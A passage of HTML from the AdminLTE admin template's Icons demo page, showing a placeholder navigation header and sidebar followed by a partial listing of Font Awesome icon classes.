line-height: 1.4;
text-align: center;
border: 1px solid #ddd;
}
.bs-glyphicons .glyphicon {
margin-top: 5px;
margin-bottom: 10px;
font-size: 24px;
}
.bs-glyphicons .glyphicon-class {
display: block;
text-align: center;
word-wrap: break-word; /* Help out IE10+ with class names */
}
.bs-glyphicons li:hover {
background-color: rgba(86,61,124,.1);
}
@media (min-width: 768px) {
.bs-glyphicons li {
width: 12.5%;
}
}
</style>
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script>
<![endif]-->
</head>
<body class="skin-blue">
<!-- header logo: style can be found in header.less -->
<header class="header">
<a href="../../index.html" class="logo">
<!-- Add the class icon to your logo image or logo icon to add the margining -->
AdminLTE
</a>
<!-- Header Navbar: style can be found in header.less -->
<nav class="navbar navbar-static-top" role="navigation">
<!-- Sidebar toggle button-->
<a href="#" class="navbar-btn sidebar-toggle" data-toggle="offcanvas" role="button">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</a>
<div class="navbar-right">
<ul class="nav navbar-nav">
<!-- Messages: style can be found in dropdown.less-->
<li class="dropdown messages-menu">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
<i class="fa fa-envelope"></i>
<span class="label label-success">4</span>
</a>
<ul class="dropdown-menu">
<li class="header">You have 4 messages</li>
<li>
<!-- inner menu: contains the actual data -->
<ul class="menu">
<li><!-- start message -->
<a href="#">
<div class="pull-left">
<img src="../../img/bf_skinner.jpg" class="img-circle" alt="User Image"/>
</div>
<h4>
Support Team
<small><i class="fa fa-clock-o"></i> 5 mins</small>
</h4>
<p>Why not buy a new awesome theme?</p>
</a>
</li><!-- end message -->
<li>
<a href="#">
<div class="pull-left">
<img src="../../img/avatar2.png" class="img-circle" alt="user image"/>
</div>
<h4>
AdminLTE Design Team
<small><i class="fa fa-clock-o"></i> 2 hours</small>
</h4>
<p>Why not buy a new awesome theme?</p>
</a>
</li>
<li>
<a href="#">
<div class="pull-left">
<img src="../../img/avatar.png" class="img-circle" alt="user image"/>
</div>
<h4>
Developers
<small><i class="fa fa-clock-o"></i> Today</small>
</h4>
<p>Why not buy a new awesome theme?</p>
</a>
</li>
<li>
<a href="#">
<div class="pull-left">
<img src="../../img/avatar2.png" class="img-circle" alt="user image"/>
</div>
<h4>
Sales Department
<small><i class="fa fa-clock-o"></i> Yesterday</small>
</h4>
<p>Why not buy a new awesome theme?</p>
</a>
</li>
<li>
<a href="#">
<div class="pull-left">
<img src="../../img/avatar.png" class="img-circle" alt="user image"/>
</div>
<h4>
Reviewers
<small><i class="fa fa-clock-o"></i> 2 days</small>
</h4>
<p>Why not buy a new awesome theme?</p>
</a>
</li>
</ul>
</li>
<li class="footer"><a href="#">See All Messages</a></li>
</ul>
</li>
<!-- Notifications: style can be found in dropdown.less -->
<li class="dropdown notifications-menu">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
<i class="fa fa-warning"></i>
<span class="label label-warning">10</span>
</a>
<ul class="dropdown-menu">
<li class="header">You have 10 notifications</li>
<li>
<!-- inner menu: contains the actual data -->
<ul class="menu">
<li>
<a href="#">
<i class="ion ion-ios7-people info"></i> 5 new members joined today
</a>
</li>
<li>
<a href="#">
<i class="fa fa-warning danger"></i> Very long description here that may not fit into the page and may cause design problems
</a>
</li>
<li>
<a href="#">
<i class="fa fa-users warning"></i> 5 new members joined
</a>
</li>
<li>
<a href="#">
<i class="ion ion-ios7-cart success"></i> 25 sales made
</a>
</li>
<li>
<a href="#">
<i class="ion ion-ios7-person danger"></i> You changed your username
</a>
</li>
</ul>
</li>
<li class="footer"><a href="#">View all</a></li>
</ul>
</li>
<!-- Tasks: style can be found in dropdown.less -->
<li class="dropdown tasks-menu">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
<i class="fa fa-tasks"></i>
<span class="label label-danger">9</span>
</a>
<ul class="dropdown-menu">
<li class="header">You have 9 tasks</li>
<li>
<!-- inner menu: contains the actual data -->
<ul class="menu">
<li><!-- Task item -->
<a href="#">
<h3>
Design some buttons
<small class="pull-right">20%</small>
</h3>
<div class="progress xs">
<div class="progress-bar progress-bar-aqua" style="width: 20%" role="progressbar" aria-valuenow="20" aria-valuemin="0" aria-valuemax="100">
<span class="sr-only">20% Complete</span>
</div>
</div>
</a>
</li><!-- end task item -->
<li><!-- Task item -->
<a href="#">
<h3>
Create a nice theme
<small class="pull-right">40%</small>
</h3>
<div class="progress xs">
<div class="progress-bar progress-bar-green" style="width: 40%" role="progressbar" aria-valuenow="20" aria-valuemin="0" aria-valuemax="100">
<span class="sr-only">40% Complete</span>
</div>
</div>
</a>
</li><!-- end task item -->
<li><!-- Task item -->
<a href="#">
<h3>
Some task I need to do
<small class="pull-right">60%</small>
</h3>
<div class="progress xs">
<div class="progress-bar progress-bar-red" style="width: 60%" role="progressbar" aria-valuenow="20" aria-valuemin="0" aria-valuemax="100">
<span class="sr-only">60% Complete</span>
</div>
</div>
</a>
</li><!-- end task item -->
<li><!-- Task item -->
<a href="#">
<h3>
Make beautiful transitions
<small class="pull-right">80%</small>
</h3>
<div class="progress xs">
<div class="progress-bar progress-bar-yellow" style="width: 80%" role="progressbar" aria-valuenow="20" aria-valuemin="0" aria-valuemax="100">
<span class="sr-only">80% Complete</span>
</div>
</div>
</a>
</li><!-- end task item -->
</ul>
</li>
<li class="footer">
<a href="#">View all tasks</a>
</li>
</ul>
</li>
<!-- User Account: style can be found in dropdown.less -->
<li class="dropdown user user-menu">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
<i class="glyphicon glyphicon-user"></i>
<span>BF Skinner <i class="caret"></i></span>
</a>
<ul class="dropdown-menu">
<!-- User image -->
<li class="user-header bg-light-blue">
<img src="../../img/bf_skinner.jpg" class="img-circle" alt="User Image" />
<p>
BF Skinner - Web Developer
<small>Member since Nov. 2012</small>
</p>
</li>
<!-- Menu Body -->
<li class="user-body">
<div class="col-xs-4 text-center">
<a href="#">Followers</a>
</div>
<div class="col-xs-4 text-center">
<a href="#">Sales</a>
</div>
<div class="col-xs-4 text-center">
<a href="#">Friends</a>
</div>
</li>
<!-- Menu Footer-->
<li class="user-footer">
<div class="pull-left">
<a href="#" class="btn btn-default btn-flat">Profile</a>
</div>
<div class="pull-right">
<a href="#" class="btn btn-default btn-flat">Sign out</a>
</div>
</li>
</ul>
</li>
</ul>
</div>
</nav>
</header>
<div class="wrapper row-offcanvas row-offcanvas-left">
<!-- Left side column. contains the logo and sidebar -->
<aside class="left-side sidebar-offcanvas">
<!-- sidebar: style can be found in sidebar.less -->
<section class="sidebar">
<!-- Sidebar user panel -->
<div class="user-panel">
<div class="pull-left image">
<img src="../../img/bf_skinner.jpg" class="img-circle" alt="User Image" />
</div>
<div class="pull-left info">
<p>Hello, Jane</p>
<a href="#"><i class="fa fa-circle text-success"></i> Online</a>
</div>
</div>
<!-- search form -->
<form action="#" method="get" class="sidebar-form">
<div class="input-group">
<input type="text" name="q" class="form-control" placeholder="Search..."/>
<span class="input-group-btn">
<button type='submit' name='seach' id='search-btn' class="btn btn-flat"><i class="fa fa-search"></i></button>
</span>
</div>
</form>
<!-- /.search form -->
<!-- sidebar menu: : style can be found in sidebar.less -->
<ul class="sidebar-menu">
<li>
<a href="../../index.html">
<i class="fa fa-dashboard"></i> <span>Dashboard</span>
</a>
</li>
<li>
<a href="../widgets.html">
<i class="fa fa-th"></i> <span>Widgets</span> <small class="badge pull-right bg-green">new</small>
</a>
</li>
<li class="treeview">
<a href="#">
<i class="fa fa-bar-chart-o"></i>
<span>Charts</span>
<i class="fa fa-angle-left pull-right"></i>
</a>
<ul class="treeview-menu">
<li><a href="../charts/morris.html"><i class="fa fa-angle-double-right"></i> Morris</a></li>
<li><a href="../charts/flot.html"><i class="fa fa-angle-double-right"></i> Flot</a></li>
<li><a href="../charts/inline.html"><i class="fa fa-angle-double-right"></i> Inline charts</a></li>
</ul>
</li>
<li class="treeview active">
<a href="#">
<i class="fa fa-laptop"></i>
<span>UI Elements</span>
<i class="fa fa-angle-left pull-right"></i>
</a>
<ul class="treeview-menu">
<li><a href="general.html"><i class="fa fa-angle-double-right"></i> General</a></li>
<li class="active"><a href="icons.html"><i class="fa fa-angle-double-right"></i> Icons</a></li>
<li><a href="buttons.html"><i class="fa fa-angle-double-right"></i> Buttons</a></li>
<li><a href="sliders.html"><i class="fa fa-angle-double-right"></i> Sliders</a></li>
<li><a href="timeline.html"><i class="fa fa-angle-double-right"></i> Timeline</a></li>
</ul>
</li>
<li class="treeview">
<a href="#">
<i class="fa fa-edit"></i> <span>Forms</span>
<i class="fa fa-angle-left pull-right"></i>
</a>
<ul class="treeview-menu">
<li><a href="../forms/general.html"><i class="fa fa-angle-double-right"></i> General Elements</a></li>
<li><a href="../forms/advanced.html"><i class="fa fa-angle-double-right"></i> Advanced Elements</a></li>
<li><a href="../forms/editors.html"><i class="fa fa-angle-double-right"></i> Editors</a></li>
</ul>
</li>
<li class="treeview">
<a href="#">
<i class="fa fa-table"></i> <span>Tables</span>
<i class="fa fa-angle-left pull-right"></i>
</a>
<ul class="treeview-menu">
<li><a href="../tables/simple.html"><i class="fa fa-angle-double-right"></i> Simple tables</a></li>
<li><a href="../tables/data.html"><i class="fa fa-angle-double-right"></i> Data tables</a></li>
</ul>
</li>
<li>
<a href="../calendar.html">
<i class="fa fa-calendar"></i> <span>Calendar</span>
<small class="badge pull-right bg-red">3</small>
</a>
</li>
<li>
<a href="../mailbox.html">
<i class="fa fa-envelope"></i> <span>Mailbox</span>
<small class="badge pull-right bg-yellow">12</small>
</a>
</li>
<li class="treeview">
<a href="#">
<i class="fa fa-folder"></i> <span>Examples</span>
<i class="fa fa-angle-left pull-right"></i>
</a>
<ul class="treeview-menu">
<li><a href="../examples/invoice.html"><i class="fa fa-angle-double-right"></i> Invoice</a></li>
<li><a href="../examples/login.html"><i class="fa fa-angle-double-right"></i> Login</a></li>
<li><a href="../examples/register.html"><i class="fa fa-angle-double-right"></i> Register</a></li>
<li><a href="../examples/lockscreen.html"><i class="fa fa-angle-double-right"></i> Lockscreen</a></li>
<li><a href="../examples/404.html"><i class="fa fa-angle-double-right"></i> 404 Error</a></li>
<li><a href="../examples/500.html"><i class="fa fa-angle-double-right"></i> 500 Error</a></li>
<li><a href="../examples/blank.html"><i class="fa fa-angle-double-right"></i> Blank Page</a></li>
</ul>
</li>
</ul>
</section>
<!-- /.sidebar -->
</aside>
<!-- Right side column. Contains the navbar and content of the page -->
<aside class="right-side">
<!-- Content Header (Page header) -->
<section class="content-header">
<h1>
Icons
<small>a set of beautiful icons</small>
</h1>
<ol class="breadcrumb">
<li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li>
<li><a href="#">UI</a></li>
<li class="active">Icons</li>
</ol>
</section>
<!-- Main content -->
<section class="content">
<div class='row'>
<div class='col-xs-12'>
<div class="nav-tabs-custom">
<ul class="nav nav-tabs">
<li class="active"><a href="#fa-icons" data-toggle="tab">Font Awesome</a></li>
<li><a href="#glyphicons" data-toggle="tab">Glyphicons</a></li>
</ul>
<div class="tab-content">
<!-- Font Awesome icons -->
<div class="tab-pane active" id="fa-icons" >
<section id="new">
<h4 class="page-header">11 New Icons in 4.0</h4>
<div class="row fontawesome-icon-list">
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-rub"></i> fa-rub</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-ruble"></i> fa-ruble <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-rouble"></i> fa-rouble <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-pagelines"></i> fa-pagelines</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-stack-exchange"></i> fa-stack-exchange</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-circle-o-right"></i> fa-arrow-circle-o-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-circle-o-left"></i> fa-arrow-circle-o-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-square-o-left"></i> fa-caret-square-o-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-toggle-left"></i> fa-toggle-left <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-dot-circle-o"></i> fa-dot-circle-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-wheelchair"></i> fa-wheelchair</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-vimeo-square"></i> fa-vimeo-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-try"></i> fa-try</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-turkish-lira"></i> fa-turkish-lira <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-plus-square-o"></i> fa-plus-square-o</div>
</div>
</section>
<section id="web-application">
<h4 class="page-header">Web Application Icons</h4>
<div class="row fontawesome-icon-list">
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-adjust"></i> fa-adjust</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-anchor"></i> fa-anchor</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-archive"></i> fa-archive</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrows"></i> fa-arrows</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrows-h"></i> fa-arrows-h</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrows-v"></i> fa-arrows-v</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-asterisk"></i> fa-asterisk</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-ban"></i> fa-ban</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bar-chart-o"></i> fa-bar-chart-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-barcode"></i> fa-barcode</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bars"></i> fa-bars</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-beer"></i> fa-beer</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bell"></i> fa-bell</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bell-o"></i> fa-bell-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bolt"></i> fa-bolt</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-book"></i> fa-book</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bookmark"></i> fa-bookmark</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bookmark-o"></i> fa-bookmark-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-briefcase"></i> fa-briefcase</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bug"></i> fa-bug</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-building-o"></i> fa-building-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bullhorn"></i> fa-bullhorn</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bullseye"></i> fa-bullseye</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-calendar"></i> fa-calendar</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-calendar-o"></i> fa-calendar-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-camera"></i> fa-camera</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-camera-retro"></i> fa-camera-retro</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-square-o-down"></i> fa-caret-square-o-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-square-o-left"></i> fa-caret-square-o-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-square-o-right"></i> fa-caret-square-o-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-square-o-up"></i> fa-caret-square-o-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-certificate"></i> fa-certificate</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-check"></i> fa-check</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-check-circle"></i> fa-check-circle</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-check-circle-o"></i> fa-check-circle-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-check-square"></i> fa-check-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-check-square-o"></i> fa-check-square-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-circle"></i> fa-circle</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-circle-o"></i> fa-circle-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-clock-o"></i> fa-clock-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-cloud"></i> fa-cloud</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-cloud-download"></i> fa-cloud-download</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-cloud-upload"></i> fa-cloud-upload</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-code"></i> fa-code</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-code-fork"></i> fa-code-fork</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-coffee"></i> fa-coffee</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-cog"></i> fa-cog</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-cogs"></i> fa-cogs</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-comment"></i> fa-comment</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-comment-o"></i> fa-comment-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-comments"></i> fa-comments</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-comments-o"></i> fa-comments-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-compass"></i> fa-compass</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-credit-card"></i> fa-credit-card</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-crop"></i> fa-crop</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-crosshairs"></i> fa-crosshairs</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-cutlery"></i> fa-cutlery</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-dashboard"></i> fa-dashboard <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-desktop"></i> fa-desktop</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-dot-circle-o"></i> fa-dot-circle-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-download"></i> fa-download</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-edit"></i> fa-edit <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-ellipsis-h"></i> fa-ellipsis-h</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-ellipsis-v"></i> fa-ellipsis-v</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-envelope"></i> fa-envelope</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-envelope-o"></i> fa-envelope-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-eraser"></i> fa-eraser</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-exchange"></i> fa-exchange</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-exclamation"></i> fa-exclamation</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-exclamation-circle"></i> fa-exclamation-circle</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-exclamation-triangle"></i> fa-exclamation-triangle</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-external-link"></i> fa-external-link</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-external-link-square"></i> fa-external-link-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-eye"></i> fa-eye</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-eye-slash"></i> fa-eye-slash</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-female"></i> fa-female</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-fighter-jet"></i> fa-fighter-jet</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-film"></i> fa-film</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-filter"></i> fa-filter</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-fire"></i> fa-fire</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-fire-extinguisher"></i> fa-fire-extinguisher</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-flag"></i> fa-flag</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-flag-checkered"></i> fa-flag-checkered</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-flag-o"></i> fa-flag-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-flash"></i> fa-flash <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-flask"></i> fa-flask</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-folder"></i> fa-folder</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-folder-o"></i> fa-folder-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-folder-open"></i> fa-folder-open</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-folder-open-o"></i> fa-folder-open-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-frown-o"></i> fa-frown-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-gamepad"></i> fa-gamepad</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-gavel"></i> fa-gavel</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-gear"></i> fa-gear <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-gears"></i> fa-gears <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-gift"></i> fa-gift</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-glass"></i> fa-glass</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-globe"></i> fa-globe</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-group"></i> fa-group <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-hdd-o"></i> fa-hdd-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-headphones"></i> fa-headphones</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-heart"></i> fa-heart</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-heart-o"></i> fa-heart-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-home"></i> fa-home</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-inbox"></i> fa-inbox</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-info"></i> fa-info</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-info-circle"></i> fa-info-circle</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-key"></i> fa-key</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-keyboard-o"></i> fa-keyboard-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-laptop"></i> fa-laptop</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-leaf"></i> fa-leaf</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-legal"></i> fa-legal <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-lemon-o"></i> fa-lemon-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-level-down"></i> fa-level-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-level-up"></i> fa-level-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-lightbulb-o"></i> fa-lightbulb-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-location-arrow"></i> fa-location-arrow</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-lock"></i> fa-lock</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-magic"></i> fa-magic</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-magnet"></i> fa-magnet</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-mail-forward"></i> fa-mail-forward <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-mail-reply"></i> fa-mail-reply <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-mail-reply-all"></i> fa-mail-reply-all</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-male"></i> fa-male</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-map-marker"></i> fa-map-marker</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-meh-o"></i> fa-meh-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-microphone"></i> fa-microphone</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-microphone-slash"></i> fa-microphone-slash</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-minus"></i> fa-minus</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-minus-circle"></i> fa-minus-circle</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-minus-square"></i> fa-minus-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-minus-square-o"></i> fa-minus-square-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-mobile"></i> fa-mobile</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-mobile-phone"></i> fa-mobile-phone <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-money"></i> fa-money</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-moon-o"></i> fa-moon-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-music"></i> fa-music</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-pencil"></i> fa-pencil</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-pencil-square"></i> fa-pencil-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-pencil-square-o"></i> fa-pencil-square-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-phone"></i> fa-phone</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-phone-square"></i> fa-phone-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-picture-o"></i> fa-picture-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-plane"></i> fa-plane</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-plus"></i> fa-plus</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-plus-circle"></i> fa-plus-circle</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-plus-square"></i> fa-plus-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-plus-square-o"></i> fa-plus-square-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-power-off"></i> fa-power-off</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-print"></i> fa-print</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-puzzle-piece"></i> fa-puzzle-piece</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-qrcode"></i> fa-qrcode</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-question"></i> fa-question</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-question-circle"></i> fa-question-circle</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-quote-left"></i> fa-quote-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-quote-right"></i> fa-quote-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-random"></i> fa-random</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-refresh"></i> fa-refresh</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-reply"></i> fa-reply</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-reply-all"></i> fa-reply-all</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-retweet"></i> fa-retweet</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-road"></i> fa-road</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-rocket"></i> fa-rocket</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-rss"></i> fa-rss</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-rss-square"></i> fa-rss-square</div>
